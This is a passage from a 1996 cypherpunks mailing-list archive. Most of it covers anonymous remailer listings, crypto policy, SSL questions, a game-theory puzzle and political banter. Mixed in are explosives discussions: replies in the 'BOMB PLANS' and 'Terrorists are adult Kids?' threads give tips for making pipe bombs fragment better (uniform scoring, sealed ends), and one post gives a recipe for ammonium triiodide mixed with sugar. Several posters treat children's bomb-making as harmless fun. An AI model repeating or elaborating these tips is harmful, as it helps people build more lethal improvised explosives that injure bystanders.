than the usual "matcheads and gunpowder" approach as suggested by many
"cookbooks".

> Also, nothing prevents you from making grenade-like marks on
> the pipes. It is very easy if you have the right instruments.
> While in high school in Russia, I was taught how to work with
> metal and indeed making these kind of marks is one of the most
> trivial exercises.

yes.  but for best results these "alterations" to the pipe must be of
uniform depth and spacing.

> BTW, almost all male kids in russia experiment with bomb-making,
> rocket-making, explosives and so on. Once I was going to school

I wouldn't limit that to Russia.  Every kid goes through their pyromaniacy
stage, its really just a question of how good they are at it ;)

> #57 in a tram and a small bomb exploded right in my school bag.
> It was made from Ammonium triiodide which is really unstable.
> 
> Everyone in the tram was really surprised and I was really pissed off.
> 

I'll bet.

> In the hindsight it was fairly dangerous and some of my friends were
> hurt by bombs. HOWEVER, I have a theory that males never really grow
> up and continue playing toys 'til they die. I think that guns are also
> male toys, by the way.
> 

Hrmm.. that's a little extreme, dontcha think?

> So the idea is, maybe if kids play enough with explosives WHILE THEY ARE
> KIDS, they would get enough of it and would not continue playing with them
> when they grow up (and become more dangerous). Like, I myself pretty much
> lost interest in building explosive devices and rocketry after 18.
> 

Hrmm... I've always lived in the US, and I lost interest in that sort of
thing when I was ~14...

> Since this country is too safe, kids do not get their share of danger
> and try to recoup it in adulthood. Which results in stupid terrorism.
> 

Bullshit.

 --Deviant
The world is not octal despite DEC.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfxfmjAJap8fyDMVAQENWgf+PYWEUe7j9s04Db+FbIB06HXbaJZG0PoW
12RIumrewpYgPTjOHpdMrQ404aNcxUo08MCHxF2U5+CekNgdVUzZ6BclxGzJ2m9T
4ppad/rViOyPopEGWYrZuZifmasglxLcnsQI+kl7WcN0zX9ZxH/GPpSzkhd4CUdn
AwnFrB7SAfFm8uzqFEGrPUUywiZsDmsPdv2vYHfZMR22Z64Ceaq00gchg4kvvjya
8PA77glHxPZgWq6X6JijAEgL5isyHw7S+Iwa0VROoeGOTRiU/uxhTRAdHOVhfblr
I/9yVCyQbZEx0yhqo2SU5i1p9/kbQNOCQwRULiCHR7QsZbBMx32RwQ==
=mWR2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 30 Jul 1996 01:39:18 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199607291350.GAA00405@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 29 Jul 96 6:47:32 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
nymrod   nymrod@nym.jpunix.com            ######*-**-+    13:54 100.00%
alumni   hal@alumni.caltech.edu           *####*#*##+*     2:27 100.00%
replay   remailer@replay.com              *+**********     4:59 100.00%
mix      mixmaster@remail.obscura.com     ---+----+--+  1:46:21  99.98%
portal   hfinney@shell.portal.com         ####*#####+#     1:44  99.97%
alpha    alias@alpha.c2.org               -+*++++*++++  1:43:56  99.94%
c2       remail@c2.org                    -+++*+++++++  1:53:47  99.89%
winsock  winsock@c2.org                         --..--  7:27:06  99.89%
treehole remailer@mockingbird.alias.net   -+---++-+---  3:36:15  99.85%
vegas    remailer@vegas.gateway.com       *#*#***-*#-*    18:48  99.84%
lead     mix@zifi.genetics.utah.edu       ++++++++++ +    38:33  99.61%
penet    anon@anon.penet.fi               -----------   9:09:35  99.57%
haystack haystack@holy.cow.net            +##+#+*###+*     3:57  99.38%
ncognito ncognito@rigel.cyberpass.net     -.-_...--.   16:44:18  99.15%
amnesia  amnesia@chardos.connix.com       ---++---- -   3:24:07  98.92%
lucifer  lucifer@dhp.com                  +  +++++++++    44:40  97.98%
nemesis  remailer@meaning.com             *******+****    30:09  97.48%
extropia remail@miron.vip.best.com        ----------    9:40:29  93.46%
jam      remailer@cypherpunks.ca          *****    ***    18:42  76.47%
flame    remailer@flame.alias.net                       4:18:14   4.27%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 29 Jul 1996 18:22:11 +0800
To: AwakenToMe@aol.com
Subject: Re: BOMB PLANS
In-Reply-To: <960729000357_247766065@emout15.mail.aol.com>
Message-ID: <Pine.LNX.3.94.960729070807.886B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 29 Jul 1996 AwakenToMe@aol.com wrote:

> Date: Mon, 29 Jul 1996 00:03:57 -0400
> From: AwakenToMe@aol.com
> To: sandfort@crl.com, cypherpunks@toad.com
> Subject: Re: BOMB PLANS
> 
> welllll pipe bombs do fragment. Years ago someone decided to try to put one
> under my step brothers truck tire....... needless to say...nothing happened
> to the truck or our house in front of the truck but next door and across the
> street..the houses were sprayed with metal fragments.

this would be because of not properly sealing the ends of the pipe (see
also, shotgun effect)

 --Deviant
Slowly and surely the unix crept up on the Nintendo user ...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfxjlTAJap8fyDMVAQFfzgf6AkvVjWhe2wKVmbKwuHGfxAGA3DQnmd0s
uYOINVyUOIiw7Pt1kiJpKCry4eX3n1n5wWlCvkMLNMY0+A7W1MAeWItBJlo2D2T+
vvie3APaYUbzmppWGli/3Luap1bfB+g7gRPmGlnT3zpY0Nl2ulW+kHf96/aXkycs
L4Y5alaQOql1/4/5Zq849VrVKo1xfR7adltcIBIUZ0FfQZqwyY9cZYexHUkyAOaM
R29ytqL4jCADTdznTzjNzTkzZUCWxdn8j5fQ2tO4QSp2PwJXpooz2J4Jno7e+nuT
PweAUgjFxkGHGzM8bZtijO1TNICcOpIEp6d/uYULXKtXYPMRPO6hvg==
=zsly
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 29 Jul 1996 23:28:35 +0800
To: ichudov@algebra.com
Subject: Re: Terrorists are adult Kids?
In-Reply-To: <199607290336.WAA27752@manifold.algebra.com>
Message-ID: <199607291117.HAA20498@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text




Igor Chudov writes:

> Since this country is too safe, kids do not get their share of danger
> and try to recoup it in adulthood. Which results in stupid terrorism.

"There are, in my opinion, three terrible ages of childhood -- one to
ten, ten to twenty, and twenty to thirty. And whatever age they are,
there are very few of them who are not careless and nowadays, at least
from my observation, are likely to remain so at least until they are
thirty and perhaps longer."
  -Cleveland Amory, _The Best Cat Ever_

As an aside, I read an article on a home-schooling web page that put
forth the theory that "teenagers" didn't really exist as a concept
until comparatively recently - you were either a child or an adult,
and "teenager" is a rather socially (and individually) destructive
idea that came about in this latter half of the 20th century, leading
to increased irresponsibility and a "childhood that never ends."

-Ian,
 in his third childhood.
 (and I thought most people were lucky to have a second...)

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
"We think people like seeing somebody in a uniform on the porch."  -US Postal
spokeswoman, quoted in AP, 1/27/96. I don't know about you, but most people I
know who saw someone in uniform on their porch would pull out the shotgun...
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Mon, 29 Jul 1996 22:50:47 +0800
To: cypherpunks@toad.com
Subject: A Libertine Question
Message-ID: <2.2.32.19960729122101.0069c538@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My opinions are just that, MINE but here's a question ..

In the event that drugs are legalized like alcohol ( also a drug
) and tobacco and cafeine, who will take responsibility for
housing and feeding those, who are now blameless, individuals
who can't or won't take responsibility for themselves and work
or whatever. With freedom and liberty come a lot of
responsibility. Too many people today balme every damn thing in
the world for their problems -  and get away with it....

1. My grear grand parents were slaves, I suffer because of that,
so I killed 30 White people.

2. My momma didn't give me no tit so I raped those women and
killed them

and on, and on...............
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMfysk+J+JZd/Y4yVAQEAaQQLBX5NMGRRbjP+uWSv4cxMJsI5jBq/QsIy
k9Q9a4csLhfOvVJ1ZbLszIR9xsb0oQkaK2l/2oX3igVB8+jwN8SZL0p4RJp00Tf+
D5DYVKTcF/JdwsHSSGLpdGWRExpiPxJqKlaNS7oL0R1Zx6Cqz8LlRxRMnnLkUgCo
lLNUKKkMJZ5FuQ==
=a8IV
-----END PGP SIGNATURE-----
Charles E. Sparks<sparks@bah.com>    
In God we trust, all others we encrypt !
http:/www.clark.net/pub/charley/index.htm
    Public Key At 
http://www.clark.net/pub/charley/cp_1.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 29 Jul 1996 23:45:47 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Terrorists are adult Kids?
In-Reply-To: <199607290336.WAA27752@manifold.algebra.com>
Message-ID: <199607291256.IAA04683@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home writes:

: Once I was going to school
: #57 in a tram and a small bomb exploded right in my school bag.
: It was made from Ammonium triiodide which is really unstable.

That reminds me of my father's little jiffy fly killer recipe:

Prepare a batch of ammonium tri-iodide and while it is still moist mix
it with granulated sugar and then spread that mixture on the surfaces
where you expect the flies to land.  The flies will be attracted to the
sugar and then POOF! . . . .

Trouble is I was always too impatient and in checking to see whether
the ammonium tri-iodide was ready I would blow the stuff up in my
face--which rather gave a new meaning to the phrase ``red-faced''.

: So the idea is, maybe if kids play enough with explosives WHILE THEY ARE
: KIDS, they would get enough of it and would not continue playing with them
: when they grow up (and become more dangerous). Like, I myself pretty much
: lost interest in building explosive devices and rocketry after 18.

I suspect that there is a lot of truth in that.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Tue, 30 Jul 1996 03:13:45 +0800
To: "'source@iaccess.za>
Subject: RE: Implementing DSS Fortezza KEA
Message-ID: <01BB7D2F.494C6960@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	source@iaccess.za[SMTP:source@iaccess.za]
Sent: 	Monday, July 29, 1996 7:05 AM
To: 	coderpunks@toad.com
Subject: 	Implementing DSS Fortezza KEA

We have almost completed our SSL 3.0 implementation, and are looking for the 
specs on Fortezza DSS and KEA and would like to know where it is available.

>From the US National Security Agency.
As another respondee said, the details of KEA are not available, but information
on implementation of the protocol is.  It's in the public domain.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 29 Jul 1996 18:15:57 +0800
To: cypherpunks@toad.com
Subject: Re: TLAs on cypherpnks (was Re: ALL OF YOU ARE CRIMINAL HACKERS)
In-Reply-To: <Pine.SUN.3.91.960728184132.15273A-100000@eff.org>
Message-ID: <199607290725.JAA24074@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


+ I believe my source, who's given me nothing but accurate information
+ before. YMMV, and you will of course filter this through how much you
+ trust *me* to evaluate him. But in the absence of a formal statement from
+ the NSA legal counsel, I think this as good as it gets. 
+ 
+ -Declan

Well, you can always check on the subscribers list.  There are several
addresses from NSA in there (for example ncsc.mil).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Tue, 30 Jul 1996 04:33:24 +0800
To: cypherpunks@toad.com
Subject: Re: your favorite poison recipes
Message-ID: <v03007600ae22aa1256ee@[204.179.128.22]>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:

>Please post your favorite poison recipes to this mlist.
I'd have to say Federal Match in.308, Lead poisoning -- Long distance.


martian Minow writes:
>
>Rare roast beef, baked potato with plenty of butter, red wine.
>
Martin; last time I checked you were a trickle down vegaterian too.


Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A



Expanded Recipient List:






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Seth I. Rich" <seth@hygnet.com>
Date: Tue, 30 Jul 1996 01:16:38 +0800
To: Charley Sparks <cypherpunks@toad.com
Subject: Re: A Libertine Question
Message-ID: <199607291359.JAA00921@arkady.hygnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>My opinions are just that, MINE but here's a question ..

You mean "libertarian" -- not "libertine".  Got me all hopeful
for something juicy and fun.

Seth
---------------------------------------------------------------------------
Seth I. Rich - seth@hygnet.com            "Info-Puritan elitist crapola!!"
Systems Administrator / Webmaster, HYGNet             (pbeilard@direct.ca)
Rabbits on walls, no problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Tue, 30 Jul 1996 05:28:11 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Terrorists are adult Kids?
In-Reply-To: <Pine.SUN.3.91.960728175909.9109A-100000@crl13.crl.com>
Message-ID: <v03007801ae22a81824eb@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


>In the hindsight it was fairly dangerous and some of my friends were
>hurt by bombs. HOWEVER, I have a theory that males never really grow 
>up and continue playing toys 'til they die. I think that guns are also
>male toys, by the way. 
>
>So the idea is, maybe if kids play enough with explosives WHILE THEY ARE
>KIDS, they would get enough of it and would not continue playing with them
>when they grow up (and become more dangerous). Like, I myself pretty much
>lost interest in building explosive devices and rocketry after 18.
>
An interesting theory, which my experience supports.

I started with model rocketry, and then discovered that it was more fun to blow the rockets up, rather than have them come back to earth. (You don't have to sweat the construction details as much, either)
About the time I turned 21, I lost interest in making exploding rockets and blowing craters in sand dumes.


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 30 Jul 1996 03:04:00 +0800
To: cypherpunks@toad.com
Subject: (Don't laugh *too* hard now...) "Filter"software for moneylaundering
Message-ID: <v03007608ae22822feec7@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Encoding: 17 TEXT
Date:         Mon, 29 Jul 1996 16:06:53 +-200
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Andrzej Adamski <aadamski@CC.UNI.TORUN.PL>
Subject:      "Filter"software for money laundering
Comments: cc: "comcri-l@man.torun.pl" <comcri-l@man.torun.pl>,
          "lacc@suburbia.net" <lacc@suburbia.net>
To: Multiple recipients of list CYBERIA-L <CYBERIA-L@LISTSERV.AOL.COM>

Sorry for cross-posting this message:

Dear All,

 Are you familiar with any
     software or any listing of producers of software to be used in
     tracking money-laundering?

     If so, let me know.

     Regards,

        Andrzej Adamski
        Chair of Criminal Law & Criminal Policy
        Nicolas Copernicus Univwersity
        87-100 Torun, Poland
        aadamski@cc.uni.torun.pl

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 30 Jul 1996 06:00:57 +0800
To: perry@piermont.com
Subject: Re: Usenet Conference on Security
Message-ID: <199607291805.LAA13951@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:34 PM 7/26/96 -0400, Perry E. Metzger wrote:
>As an aside, the stuff Datafellows is selling is, I believe, a
>commercial version of SSH, which is very good stuff. Its a full
>replacement for the whole berkeley "r" utilities using strong crypto
>(public key and conventional) for authentication and privacy. Does
>rlogin, rsh, redirects X sessions, slices and dices, etc. Really
>spiffy.

In addition to SSH, I also picked up a flyer for "F-Secure Desktop", a disk
encryption package for Windows.

Sorry I didn't pick up their "what we sell" flyer.  You should be able to
get that information from http://www.datafellows.com or
f-Secure-sales@datafellows.com


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Tue, 30 Jul 1996 02:53:50 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: "privatizing" phones?
Message-ID: <2.2.32.19960729151349.006e8264@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 07/28/96 +0200, Remo Pini wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>To: cypherpunks@toad.com
>Date: Sun Jul 28 12:24:57 1996
>> Even if they did change the frequency the call was on, 
>> it would be a simple matter to decode how the frequency
>> change was negotiated, and "follow" the call (also easily
>> accomplished with cellular calls).  Failing that, there is 
>> a very limited range of frequencies allocated for cordless 
>> fones, and simply re-scanning for the conversation is a 
>> trivial inconvenience. //cerridwyn//
>> 
>
>Most of those systems do also change the order of the transmitted data, and 
>that's not limited to a few possibilities. If it's digital, they usually 
>encrypt it (only weak, but hey, you normally have to find the key real 
>time!)
>>
The key doesn't need to be found in real time!  You can always record the
call and decrypt it later.  If the information deals with an event in the
future, you could have plenty of time to crack it.
 
                                                     G.C.G.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Tue, 30 Jul 1996 02:39:18 +0800
To: cypherpunks@toad.com
Subject: Secure drive?
Message-ID: <2.2.32.19960729153141.006d12f8@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


Greetings all,
  Does anyone know if the 1.4a version works correctly with Win95?  If not,
is there an updated version?  If not, will there be one anytime soon?  If
not, will PGPLIB (aka PGP3.0) provide a similar function?  If not... heck!
 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.        |
 | Oyster Bay, New York     |     Average people talk about things.      |
 | gcg@pb.net               |      Small people talk about people.       |
 |-----------------------------------------------------------------------|
 |That which does not kill us, makes us stranger.    - Trevor Goodchild  |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Mon, 29 Jul 1996 20:50:15 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
Message-ID: <960729114511.2080086f@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


> I forgot to say what the GOALS are. The goals of every individual
> cypherpunk are (in from highest to lowest priority): 
> 
> 1. Stay alive
> 2. Get as much money as possible
> 3. Keep as many cypherpunks alive as possible, all other things being equal.
> 
> 	- Igor.
> 

	Most responses fail to consider "suicidal" behaviours. In many
cases, when there are rounds left, it may be worth playing against your
interests if that will yield later a higher benefit.

	The fact that anyone makes a proposal is of no interest to anyone
else as long as goal#2 stands over goal#3 and there is enough people to
stablish uncertainty of behaviour.

	As an example, if #1 proposes he gets all the money, all other
things being equal, #3,#5,...#19 should theoretically vote for him since
they know they can't win as long as there's a #2...

	But #19 knows he could win if only he and #20 were alive. It is
in his interest to vote 'no'. If #1 dies, then he may get a chance, because
#18 is in his same position and might do the same in the other rounds. Yes,
you can follow it backwards and discover that goal #3 above then should
take precedence. Should it?

	There's still goal #2 above. If the c'punks can't communicate 
among them then that's the end of it. #1 gets all. But if they can, 
there's another side:

	If you not only know the order of proposers, but also their
proposals, then you can always play 'unfair' or 'against you' until the
proposal that's better for you comes. Say #2 speaks to #20 and agrees to
propose that he'll get some money too. Restriction #2 above takes
precedence and proposer #2 knows he'll get #20 vote as long as he makes
that proposal. It is in #20's interest to vote against #1 "all for me" in 
the first round since that way he'll get some money on #2's proposal.

	But then #3, #4, etc... can play the same game. The first one that
can provide a proposal making happier most of the people will win...

	Say #1 proposes to even split between half of them. Will that work?
If they can't cheat their vote that's the end of it. Then comes another
point in place. Can they cheat?

	Obviously, under these arrangements, anyone proposing he gets all
money, other than #19 risks his life for others can agree into a better
split. But OTOH, #18 and #20 know that they can agree on something better
than #19's proposal of he getting all. If #18 cheats, #19 can agree with
#20 to split even and #18 is dead. If #18 doesn't cheat. then #20 has
two chices:

	- believe #19 will not cheat and propose an even split. Vote against.
	- fear #19 cheating and the risk of not getting anything. Odds are
all for #19, so he shoudl vote for #18 proposal.

	The only choice is for #18 and #20 to agree in an even split, where
#18 can also cheat and ask for all money. But then he risks #19 and #20 
agreeing on voting against him. So #18 must offer something to #20, and it
must be enough for #20 not wanting to take the risk of #19 cheating too.

	Following back, everybody but #19 and #20 risk their lives. #19 is
interested in everybody else being dead, and #20 in anyone giving him
anything. Anyone who gives anything to #20 will get his vote. Anyone not
giving anything to #20 risks #20 voting for someone else on the hope he'll
get something on the next proposal. And everyone needs an agreement with
#20 to keep his life.

	As you go back, #18 has a better chance of staying alive if he can
ensure #19 and #20 won't agree because his offer is safer than the risks
involved for #20. Work backwards.

	The point is, the expectancies of winning work at all round, and at
every point you are interested in not dying. As you reach the end if you
make an agreement and cheat you have less risk (there are less possibilities
for new agreements), but if you have gone to that, it's because more and
more people have cheated before, and confidence will be low. So you are
more interested in not cheating to keep your life.

	I think the net result is that most c'punks will be offering 
even splits to ensure a maximum of votes. As people makes arrangements and
c'punks dies, confidence and credibility on agreements in advance will
fail, so the risk for the latests increases too...

	In the end all comes down to gullibility of the partners. If you
assume they are not gullible, you'll vote for the first proposal of an
even split to save your life. If they are, then you can play against
while there remains gullible people, but then you know your cheating is
your dead (except for #19 and #20) and you risk less by going even.

	That's more or less like real life: one can temporarily play
against himself if that will yield later a higher benefit. But that
comes at a cost in credibility, and the more you use it, the less useful
it becomes.

	On a non-gullible environment, the first time you cheat your
reputation breaks and it is in everyone else's interest to play against
you. That's the ancient concept of honor. On a less-exceptic or more
tolerant environment you may have a few goes before getting people
absolutely exceptical again. The number of goes will depend on their
tolerance level.

	Same for the game: there can be cheating up to a tolerance level.
After that everyone will know that a non-even split proposal will take out 
your life. Where the border comes is a matter of circumstances.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: L Jean Camp <lc2m+@andrew.cmu.edu>
Date: Tue, 30 Jul 1996 03:26:41 +0800
To: cypherpunks@toad.com
Subject: call your rep
Message-ID: <clzBmwK00iWP44NGUO@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




>>the Senate commerce committee held its final
>>hearing on Burns's bill yesterday with the appearance
>>of FBI Director Freeh and Bill Reinsch at Dept of Commerce.
>>The Senate committee would like to hold a mark-up on
>>the bill (Pro-CODE) next week, but lack the certain votes of the members
>>of the committee to do so.
>>
>>Expressions of support for S. 1726 to critical Democrats
>>and Republicans are needed--especially:
>>  Olympia Snowe, R-Maine, 224-5344; Bill Frist, R-Tennessee
>>224-3344; Spencer Abraham, R-Michigan 224-4822; Ernest
>>Hollings, D-South Carolina, 224-6121; Daniel Inouye D-Hawaii
>>224-3934; Wendell Ford D-Kentucky 224-4343; James Exon,
>>D-Nebraska 224-4224; Jay  Rockefeller D-West Virginia 224-6472;
>>John Kerry D-Massachusetts 224-2742; John Breaux D-Louisiana
>>224-4623; Richard Bryan D-Nevada 224-6244; Byron Dorgan
>>D-North Darkota 224-2551.
>>
>>Calls are needed by Tuesday in order to schedule the mark-up.
>> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: darryl.gittins@edrd.dnd.ca (Darryl Gittins)
Date: Tue, 30 Jul 1996 05:56:48 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <96Jul29.105559pdt.21893@hsr.edrd.dnd.ca>
MIME-Version: 1.0
Content-Type: text/plain



Hey...

how do I get on the mailing lissst....?

Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 30 Jul 1996 06:44:58 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <199607291030.GAA29365@unix.asb.com>
Message-ID: <v03007801ae22b81940ed@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 PM -0700 7/28/96, Deranged Mutant wrote:

>> This, and similar remarks by others, consistently misses the point which I
>> have been making for about a year now, and which Director Freeh finally
>> made explicit in his testimony last week. That is--the government is
>> concerned with mass market software incorporating robust crypto, used
>> overseas, and recognizes that they can't keep niche products off the
>[..]
>
>Really? The RAR archiver is getting quite popular (DOS and OS/2), and uses
